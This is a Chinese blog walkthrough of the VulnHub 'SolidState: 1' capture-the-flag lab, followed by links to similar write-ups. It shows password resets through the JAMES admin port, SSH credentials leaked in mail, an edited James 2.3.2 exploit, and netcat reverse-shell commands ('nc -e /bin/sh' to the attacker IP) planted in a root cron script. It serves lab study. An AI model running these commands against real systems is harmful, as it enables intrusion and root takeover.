No.37-VulnHub-SolidState: 1-Walkthrough渗透学习

最新推荐文章于 2024-01-03 15:03:07 发布
最新推荐文章于 2024-01-03 15:03:07 发布
阅读量998 收藏 1
点赞数 1
文章标签: python linux java 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34801745/article/details/104121867
版权

**

VulnHub-SolidState: 1-Walkthrough

**

靶机地址:https://www.vulnhub.com/entry/solidstate-1,261/
靶机难度:中级(CTF)
靶机发布日期:2018年9月12日
靶机描述:
它最初是为HackTheBox创建的
目标:得到root权限&找到flag.txt
作者:大余
时间:2020-01-31
请注意:对于所有这些计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为解决该CTF的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集

在这里插入图片描述我们在VM中需要确定攻击目标的IP地址,需要使用nmap获取目标IP地址:
在这里插入图片描述
我们已经找到了此次CTF目标计算机IP地址:192.168.182.139
在这里插入图片描述
nmap发现了22(ssh)、25(smtp)、80(http)、110(pop3)、119(nntp)、4555(admin)端口是开放的…4555还是james-admin JAMES Remote Admin 2.3.2…存在漏洞,链接
在这里插入图片描述
dirb和nikto,以及gobuster都没发现什么…
这边直接看看4555…这边需要用nc链接…因为是Remote Admin Service…
在这里插入图片描述
命令:nc 192.168.182.139 4555
在这里插入图片描述
listusers命令可以发现服务器上的邮件列表…发现五个用户…
还能执行setpassword [username] [password]
在这里插入图片描述
使用命令将五个用户都修改密码成dayu…方便我们去渗透…
现在有了pop3的用户名密码,进去看看…
在这里插入图片描述
john的邮件信息是祝我好运…没啥有用的…继续换…
在这里插入图片描述
可以看到James从管理员帐户向Mindy 发送了邮件,并共享了他的SSH登录凭据,在mindy用户邮件中看到了账号密码…pass: P@55W0rd1!2@
在这里插入图片描述
成功登陆mindy用户…
在这里插入图片描述
可以看到mindy用户可以利用/bin/rbash/进行反向shell提权…或者利用前面nmap就知道了Apache James Server 2.3.2在运行着…并利用35513EXP进行渗透…
在这里插入图片描述
命令:ssh mindy@192.168.182.139 "export TERM=xterm; python -c 'import pty; pty.spawn(\"/bin/sh\")'"
直接利用一句话就能提权…
或者用:
在这里插入图片描述
在本地找就行,或者在exploit上下载也行…
在这里插入图片描述
这要做个修改…
在这里插入图片描述
nc -e /bin/sh 192.168.182.149 8000 (攻击者IP)
在这里插入图片描述
命令:python 35513.py 192.168.182.139
修改好后,直接执行即可…
在这里插入图片描述
在这里插入图片描述
重新ssh访问mindy用户后,直接本地开启8000监听即可…成功提权…还有各种方法原理是一样的,就不说了…
python -c ‘import pty;pty.spawn("/bin/bash")’
在这里插入图片描述
在mindy用户下完成了第一个挑战,查看到了user内容…
在这里插入图片描述
命令:ps aux | grep james
因为前面能进入mindy用户是通过James那里得到的提示,james发了邮件给mindy…这边我查看下james运行过程…
显示了opt作为根进程…进去看看
在这里插入图片描述
有个tmp.py程序应该可以利用下,试试
在这里插入图片描述
直接写入即可…
在这里插入图片描述
命令:echo 'import os; os.system("/bin/nc 192.168.182.149 4444 -e /bin/bash")' > /opt/tmp.py
或者命令:echo "os.system('/bin/nc -e /bin/bash 192.168.182.149 4444')" >> tmp.py
或者在本地创建tmp.py文件,然后wget上传到tmp目录cp放到opt目录运行即可…
这边crontab在root的帐户下运行的,大约2~3分钟就会自动运行一次…等待即可…
在这里插入图片描述
成功提权…获得root权限查看flag…

这篇主要熟悉Apache James Server 2.3.2可利用漏洞…或者熟悉文件上传python利用也可以…最后就是找到用户底层可运行利用的py、php和sh等文件,进行修改利用即可…

由于我们已经成功得到root权限和flag,因此完成了简单靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

在这里插入图片描述

大余xiyou
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
小白的靶机VulnHub-SolidState
wo41ge的博客
02-18 1万+
靶机地址:https://www.vulnhub.com/entry/solidstate-1,261/ 开机界面就是这样 拿到靶机的IP地址:192.168.106.151 可以看到的靶机开放了22(ssh)、25(smtp)、80(http)、110(pop3)、119(nntp)、4555(james-admin) 这里有一个漏洞:JAMES Remote Admin 2.3.2存在漏洞 具体可以看这里 那我们就直接去4555端口 因为是Remote Admin Service 所以我们上nc连
vulnhub SolidState: 1
箭雨镜屋
01-18 2953
渗透思路: nmap扫描---->默认账号登录James Remote Admin修改用户密码---->登录pop3端口查看邮件内容找到系统登陆的账户密码---->ssh登录/利用Apache James Server 2.3.2远程命令执行漏洞获得反弹shell----->查找权限777的文件,并用定时任务提权
靶机渗透测试(SolidState: 1)
@小张小张的博客
11-26 1084
靶机渗透测试(): Vulnhub靶机 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 靶机难度:(Initial Shell (Easy) - Privileges Escalation (Intermediate)) 目标:Flags: 3 (local.txt, user.txt & root.txt) flag进度:3/3 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令:netdiscove
vulnhub:SolidState
cjstang的博客
06-14 782
OSCP-No.1:SolidState,主要漏洞利用方式:4555端口james服务默认密码漏洞+rbash逃逸提权
No.115-HackTheBox-Linux-SolidState-Walkthrough渗透学习
qq_34801745的博客
05-26 305
** HackTheBox-Linux-Miral-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/85 靶机难度:中级(4.5/10) 靶机发布日期:2017年10月18日 靶机描述: SolidState is a medium difficulty machine that requires chaining of multiple attack vectors in order to get a privileg
solidstate-wordpress:固态-WordPress主题
03-15
HTML页脚/ 1-4列页脚。 如何安装 从github下载zip文件 在您的wordpress后端中上传并激活主题 创建两个空页面,一个命名为Blog(最好将其永久链接更改为Blog),另一个命名为任意名称(例如Home)。 转到设置->阅读...
solidstate-homepage-clone:克隆主页,固态,utilizando HTML,CSS和JavaScript
02-09
:gear_selector: 普罗耶托网页的主页。 :airplane_selector: 技术HTML CSS JavaScript :desktop_computer_selector: 结果 Confira o resultado:
智能鱼缸控制系统-电路方案
04-20
AQH3213 SolidState继电器× 1 PCB螺钉端子× 1 插座× 1 13A插头× 1 3Amp保险丝× 1 0.33A表面贴装型自恢复保险丝,240V ac / dc× 1 母头8位1排(0.1“)× 1 原型PCB板4厘米x 6厘米双面× 1 软件应用程序和在线...
具有10.5 W单频输出的谐振泵浦1645 nm Er:YAG非平面环形振荡器
03-18
我们演示了由光纤激光器共振泵浦的单频Er:YAG非平面环形振荡器(NPRO)。 通过优化Er:YAG NPRO的参数,可获得高达10.5 W的单频激光输出,其斜率效率为60.03%。 在10.5 W的输出功率下,Er:YAG NPRO的M-2-因子在x...
电脑硬件帮助类(获取硬盘、内存信息)
09-29
硬盘类型可以通过`DriveType`属性来判断,它是一个枚举类型,包括`Fixed`(代表机械硬盘)、`SolidState`(代表固态硬盘)以及其他类型如CD/DVD驱动器等。 以下是一个简单的示例代码,用于获取并打印所有硬盘的信息...
vulnhub SolidState
n1ght的博客
01-28 92
靶机开放22/ssh、 25/smtp、80/http、 110/pop3、119/nntp、4555/james-admin等端口服务。setpassword username password 修改username的password。扫描靶机ip地址(这边我习惯arp-scan扫描)listusers 列出已经存在的用户。发现发送过来了mindy的用户名密码。root/root弱口令登录成功。发现定期执行tmp.py文件。在mindy的retr 2。-O 扫描靶机操作系统。-p- 扫描全部端口。
渗透测试】SolidState靶机渗透练习_rbash逃逸+4555端口james服务漏洞
serendipity1130的博客
09-03 719
一、信息收集: arp-scan -l nmap -sS -sV -T5 -p- 192.168.225.190 dirb http://192.168.225.190 //无有效目录 2.根据端口扫描信息,可以看到开放了邮件接收pop3服务,4555端口开放的是james-admin服务,进行远程查看: telnet 192.168.225.190 4555 //使用root root密码进行登录 help //查看指令 listusers //列用户名 setpassword mindy
vulnhub-SolidState: 1靶机渗透测试
m0_68117643的博客
07-05 909
vulnhub-SolidState: 1靶机渗透测试
靶场实战(6):OSCP备考之VulnHub SolidState
最新发布
OneMoreThink
01-03 949
靶场官网:SolidState: 1[1]实战思路:主机发现 1端口发现(服务、组件、版本) 1漏洞发现(获取权限) 222端口/SSH服务 2组件漏洞 2口令漏洞 325端口/SMTP服务 4组件漏洞 4口令漏洞 44555端口/James-Admin服务 4组件漏洞 4口令漏洞 8110端口/POP3服务 9组件漏洞 9口令漏洞 980端口/HTTP服务 12组件漏洞 12URL漏洞(目录、文...
【甄选靶场】Vulnhub百个项目渗透——项目三十七:SolidState-1(pop3,rbash逃逸,计划任务写入)
人间体佐菲的博客
10-11 611
【甄选靶场】Vulnhub百个项目渗透——项目三十七:SolidState-1(pop3,rbash逃逸,计划任务写入)
实战打靶集锦-002-SolidState
阿尔泰野狼的博客
01-21 1373
本文记述了博主打靶的心路历程。
Anaconda3 5.0.0中配置Python 3.6 + TensorFlow环境
weixin_34194359的博客
02-20 151
2019独角兽企业重金招聘Python工程师标准>>> ...
Hack the box靶机 SolidState
菜浪马废的博客
05-20 329
有可以用的漏洞 但是需要账户 什么也没有 看一下4555的管理服务 goole一下初始密码 root:root 以为可以ssh了 发现只能pop 给了账号连ssh mindy:P@55W0rd1!2@ 天啊,直接ssh可以查看root.txt 看一眼walkthrough 不太对劲啊 我没提权 重置一下机器 rbash绕过 这才对 找了半天也没啥东西 上les.py找一下 蒙蔽了 一大堆信息 看不过来都 一个有root权限的py脚本 删除/tmp文件的脚本 那直接替换 变蓝了是因为刚才.
VulnHub』hackNos: Os-hackNos-2.1-Walkthrough
ins1ght的博客
02-15 1279
LFI漏洞、rbash逃逸
20comm-um002:通讯卡设置与D网配置指南
它在Solidstate equipment(固态设备)的应用中有重要作用,这类设备与传统机电设备在操作特性上存在显著差异。 文档强调了对于固态控制设备的安全使用,指出用户应遵循Solidstate Controls应用、安装和维护的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值